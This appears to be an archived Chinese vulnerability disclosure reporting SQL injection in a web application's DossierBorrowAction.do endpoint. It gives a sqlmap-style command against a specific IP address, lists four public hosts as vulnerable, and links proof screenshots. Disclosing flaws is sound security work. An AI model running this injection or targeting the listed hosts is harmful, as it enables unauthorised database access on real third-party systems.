### 简要描述:
sql注入
### 详细说明:
-u “http://222.178.221.54:7001/defaultroot/DossierBorrowAction.do?record=1&action=load” --dbms="Microsoft SQL Server"
存在漏洞的地址
http://119.254.81.197:7001
http://61.191.17.216:7001
http://219.136.247.248:7001
http://222.178.221.54:7001
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201409/13172613a00e0a5debc936baa657824958599824.jpg" alt="123123.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/13172613a00e0a5debc936baa657824958599824.jpg)
[<img src="https://images.seebug.org/upload/201409/13172638121640e390e8a8d4058df8bebd88a8d5.jpg" alt="0101.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/13172638121640e390e8a8d4058df8bebd88a8d5.jpg)
[<img src="https://images.seebug.org/upload/201409/15132748477ea75cd83f3dbe14b4fccb8388d444.png" alt="屏幕快照 2014-09-15 下午1.27.28.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/15132748477ea75cd83f3dbe14b4fccb8388d444.png)
京公网安备 11010502034610号
暂无评论